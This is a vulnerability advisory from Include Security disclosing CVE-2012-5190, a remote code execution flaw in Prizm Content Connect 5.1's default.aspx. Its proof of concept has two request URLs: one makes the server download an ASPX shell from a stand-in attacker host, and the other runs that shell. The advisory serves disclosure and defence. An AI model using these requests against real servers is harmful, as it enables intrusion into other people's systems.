Prizm Content Connect Code Execution

` In the course of our security assessment consulting we often find 0day  
vulnerabilities and report them to vendors. In this particular case the  
vendor has unfortunately shown a general disgregard for the security risk  
of this uncovered vulnerability which was originally disclosed privately to  
them on September 27th 2012. All original deadlines and even their own  
proposed fix dates have expired, as such we're releasing this advisory so  
that affected customers can update their WAF/IDS/IPS systems to protect  
themselves from this obvious vulnerability. We hope the Accusoft team  
addresses this vulnerability in a patch or upcoming release as soon as  
possible. This vulnerablity has been assigned CVE-2012-5190.  
  
Take care,  
  
Include Security Research Team  
  
Arbitrary File Upload and Execution in Prizm Content Connect default.aspx  
  
Prizm Content Connect web document viewer converts a variety of formats  
into Adobe Flash objects so that they can be viewed in a web browser. If  
Prizm Content Connect is configured according to the installation  
instructions, it will be vulnerable to arbitrary remote code execution.  
  
By default, the Prizm software includes a script called default.aspx which  
will accept a document parameter that is a remote URL. This script will  
download the remote document, save it to the server with an  
attacker-supplied filename extension, and reveal the path to the document  
on the local filesystem.  
  
Since, in the default configuration, the download path on the local  
filesystem resides within the web server’s web root, the attacker can cause  
default.aspx to download a malicious ASPX script and save it with a  
dangerous .aspx extension. The attacker can then request the ASPX script  
from the server, causing the server to execute possibly malicious code  
contained within.  
Vulnerable versions  
  
This vulnerability was discovered in the following version, but we  
anticipate other versions to be vulnerable as well:  
  
· Prizm Content Connect 5.1  
Proof of concept  
  
First, the attacker causes the Prizm Content Connect software to download  
the malicious ASPX file:  
  
http://victim.example.com/default.aspx?document=http://attacker.example.org/aspxshell.aspx  
  
The resulting page discloses the filename to which the ASPX file was  
downloaded, e.g.:  
  
Document Location: C:\Project\  
  
Full Document Path: C:\Project\ajwyfw45itxwys45fgzomrmv.aspx  
  
Temp Location: C:\tempcache\  
  
The attacker then requests the ASPX shell from the root of the website:  
  
http://victim.example.com/ajwyfw45itxwys45fgzomrmv.aspx  
  
Assigned CVE#  
  
CVE-2012-5190  
`